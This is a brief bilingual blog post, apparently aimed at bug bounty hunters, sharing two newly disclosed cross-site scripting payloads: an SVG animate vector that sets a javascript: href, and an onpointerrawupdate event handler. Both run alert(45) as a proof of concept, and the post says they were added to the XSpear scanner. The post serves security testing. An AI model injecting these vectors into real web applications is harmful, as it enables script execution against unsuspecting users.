First new XSS Payload of 2020(svg animate, onpointerrawupdate)

First new XSS Payload of 2020(svg animate, onpointerrawupdate)

Hi hackers and bugbounty hunter! Recently, two previously unknown XSS Payloads were disclosure one after another. It’s not a payload that’s very difficult to understand, so I’ll share it briefly! 최근 기존에 알려지지 않은 XSS Payload 2개가 연달아 공개됬습니다. 이해에 큰 어려움이 있는 페이로드는 아니니, 간략하게만 내용 공유할게요!

SVG Aniamte XSS

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(45)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

onpointerrawupdate event handler for XSS

<div onpointerrawupdate=alert(45)>xss</div>

Updated XSpear (1.3.3)

I added this two payload in xspear. Please use it after the update. 2일전인가.. XSpear에는 반영해뒀습니다.

https://github.com/hahwul/XSpear/issues/49 https://github.com/hahwul/XSpear/issues/50

1.3.3으로 업데이트 후 사용하시면 기본적으로 포함됩니다 : )

gem update XSpear

Reference

https://twitter.com/XssPayloads/status/1225426346366701568 https://portswigger.net/research/svg-animate-xss-vector